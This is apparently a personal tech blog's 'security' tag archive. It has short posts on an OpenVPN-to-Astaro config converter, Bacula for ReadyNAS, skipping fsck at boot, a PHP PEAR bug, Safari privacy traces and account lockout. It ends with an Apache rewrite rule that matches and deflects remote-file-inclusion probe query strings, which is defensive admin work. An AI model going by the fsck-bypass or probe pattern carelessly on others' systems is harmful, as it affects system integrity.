Tag Archives: security

Astaro ASG as OpenVPN Access Server client

Just about four weeks ago I posted about the resurrection of the .ovpn to .apc converter script. In the meantime Alois told me in the comments that while this was nice it didn’t work for current versions of the OpenVPN Access Server and the .ovpn files it creates.

Well, since there’s been nothing much else to do I did some more work on the script and I can now happily say that it now also converts the new .ovpn format to an .apc the Astaro can understand. Unfortunately, there’s a little catch: the OpenVPN Access Server relies on ‘tls-auth’ for client connections and the Astaro neither knows of that concept not provides a method to import the needed key file. So I had to do some creative manipulation to make the Astaro do my bidding to include the necessary config statements. In addition, you will need to manually copy the key file to the Astaro to make everything work as expected. To make things as easy as possible, the script will tell you what to do.

If you’re interested, check out the latest version of ovpn-to-apc.sh on Gitorious. If it works for you, let me know. If it doesn’t, let me know, too.

.ovpn to .apc Converter Revisited

The Astaro Security Gateway (ASG) is a great firewall and remote access solution. The only flaw of it being that Astaro, too, tries to build a walled garden around their suite of products. One major drawback here is that while the ASG has outstanding capabilities as a remote access server, there’s no easy way to use it as a client to connect to an OpenVPN SSL server. The main show stopper is that the ASG expects to get all it’s connection information from a .apc file while OpenVPN at best provides a .ovpn file which has a completely different structure.
Back in 2009 Patrick Schneider provided a simple bash script that would convert .ovpn files together with the needed certificates and key files into a .apc file the ASG could read. Unfortunately the script stopped working with newer ASG releases. Since I needed the functionality for a current project, I resurrected the code, polished and updated it a bit. The result can now be found on Gitorious: the new OVPN-to-APC converter script. Feel free to clone and enhance.

Update: Just pushed a new version to Gitorious that now handles the new .ovpn format provided by the OpenVPN Access Server as well.


Vorhin rief ‘ne Kundin an, ob ich Passwort weiß.
Ich merke mir Passwörter eigentlich nie.
Aber an weltfrieden konnte ich mich in der Tat erinnern.

Wäre mir wohl ähnlich gegangen.

It comes by night and sucks the essence from your computers

Today, after some intensive initial beta testing by Jan-Piet I decided to release Bacula 3.0.2 for ReadyNAS NV/NV+/Duo/1100/X6.

For those of you who don’t know Bacula and what it does: The headline says it all. Or to quote the website:

Bacula is a set of Open Source, enterprise ready, computer programs that permit you to manage backup, recovery, and verification of computer data across a network of computers of different kinds. In technical terms, it is an Open Source, enterprise ready, network based backup program.

That said, you should know that’s it’s not a snap to configure, so be sure to read the documentation or at least have a look at the quick walk-through provided by Jan-Piet.


Bypass fsck on Linux startup

While re-installing the server hosting this site yesterday I ran into an interesting problem: The inital run of


on booting up the Linux image provided by my hoster would would report a file system inconsistency and wait for either the “root” password or a press of CTRL-D.
Since I didn’t know the “root” password (this is only supplied after installation has finished) and CTRL-D resulted in a reboot with the same result as before, I was stuck in a catch 22. Or so it seemed.


Luckily I had access to a serial console. So I could interrupt the boot process and edit the grub line with the kernel options. There adding the statement


made the Linux kernel skip the inital fsck run and voila, installation completed successfully.

To give you the whole picture: All I had to was to change this

title CentOS 5
    root (hd0,0)
    kernel /vmlinuz ro root=LABEL=/ console=tty0 console=ttyS0,57600
    initrd /initrd

to that

title CentOS 5
    root (hd0,0)
    kernel /vmlinuz ro root=LABEL=/ console=tty0 console=ttyS0,57600 fastboot
    initrd /initrd

PEAR broken in PHP 5.2.10

While trying to upgrade a customers installation to PHP 5.2.10 I learned that hard way that PEAR is broken in this release. This isn’t specific to any OS as the bug reports show but rather seems to be a general problem that slipped Q&A (who is laughing there?). All you’ll get is

"Cannot use a scalar value as an array in
phar://install-pear-nozlib.phar/PEAR/ChannelFile.php on line 1391"

when trying to install PEAR.
So, for the time being, better not upgrade to PHP 5.2.10 if you need to use PEAR.


Safari 4 Privacy Issues

As C. Harwick found out, Safari 4 leaves a messy trail of what it did. Or, to be more precise, of what you did while using Safari 4.

Those of you who’ve been trying out the new Safari 4 beta – at least on the Mac, though I imagine you could find similar data trails on the Windows version too – have no doubt been impressed at its shiny new features. But if you’re a stickler for disk space like I am, or a stickler for privacy (or, heaven help you, both), Safari’s poor housekeeping is quite alarming.


[ Full Story » ]

Astaro PostgreSQL Fix

For some months now my Astaro firewall was unable to start the PostgreSQL service on boot. Since this didn’t seem to have any real impact on function or performance, I started some feeble attempts at fixing it but never succeeded until today.

Continue reading

Security: Why locking out users is a really bad idea

In his article over at NetworkWorld, Mich Kabay gives a nice example of how the theory of security in networked systems tends to clash with reality:

“Locking out an account after only a few failed attempts has a significant impact on legitimate users and tends to cause them to choose simpler passwords or store their passwords insecurely, thus weakening security.”

Even more details about why you just shouldn’t lock out users can be found in the whole article “Locking out users gives attackers a tool for denial of service”.


Just in case

If you’re seeing a lot requests like these in your logs


this might come in handy:

# Send unwanted query strings elsewhere
RewriteCond   %{QUERY_STRING} http:\/\/.*\?\?
RewriteRule   ^.*$   http://www.turnofftheinternet.com/?     [L]

Add, adapt and change to your needs ;)